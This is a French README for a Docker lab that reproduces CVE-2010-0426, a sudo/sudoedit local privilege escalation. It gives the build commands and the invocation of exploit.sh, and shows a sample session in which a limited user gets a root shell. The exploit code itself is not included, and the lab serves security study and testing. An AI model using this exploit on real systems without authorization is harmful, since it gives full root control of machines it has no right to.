
Sudo 1.6.x <= 1.6.9p21 and 1.7.x <= 1.7.2p4 Élévation de privilèges locale et conteneur vulnérable
Sudo (su « do ») permet à un administrateur système d'accorder à certains utilisateurs (ou groupes d'utilisateurs) la possibilité d'exécuter certaines (ou toutes) commandes en tant que root tout en enregistrant toutes les commandes et arguments.
Pour configurer un environnement vulnérable pour votre test, vous aurez besoin de Docker installé, et exécutez simplement la commande suivante :
docker build -t privesc/cve-2010-0426 .
docker run --rm -it privesc/cve-2010-0426
Et cela générera un shell interactif avec des privilèges d'utilisateur limités.
Le bug a été trouvé dans sudoedit, qui ne gère pas correctement la commande 'sudoedit', ce qui permet à un utilisateur malveillant de remplacer la commande sudoedit réelle par une commande arbitraire.
Des attaquants locaux pourraient exploiter ce problème pour exécuter des commandes arbitraires en tant qu'utilisateur 'root'. Des exploits réussis peuvent compromettre complètement un ordinateur affecté.
Pour exploiter cette cible, exécutez simplement :
./exploit.sh
Si vous utilisez cette image vulnérable, vous pouvez simplement exécuter :
user@023b47ff82ca:~$ sudo -V
Sudo version 1.7.2
user@023b47ff82ca:~$ sudo -l
User user may run the following commands on this host:
(root) NOPASSWD: sudoedit /etc/fstab
user@023b47ff82ca:~$ ./exploit.sh /etc/fstab
[+] CVE-2010-0426 exploit by t0kx
[+] Prepared sudoedit...
[+] Run sudoedit
root@023b47ff82ca:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@023b47ff82ca:/tmp#
Cette faille a été découverte par Slouching.
Ce programme ou les précédents sont uniquement à des fins éducatives. Ne l'utilisez pas sans autorisation. La clause de non-responsabilité habituelle s'applique, en particulier le fait que moi (t0kx) ne suis pas responsable des dommages causés par l'utilisation directe ou indirecte des informations ou fonctionnalités fournies par ces programmes. L'auteur ou tout fournisseur d'accès Internet ne porte AUCUNE responsabilité quant au contenu ou à l'utilisation abusive de ces programmes ou de leurs dérivés. En utilisant ces programmes, vous acceptez le fait que tout dommage (perte de données, crash du système, compromission du système, etc.) causé par l'utilisation de ces programmes n'est pas de la responsabilité de t0kx.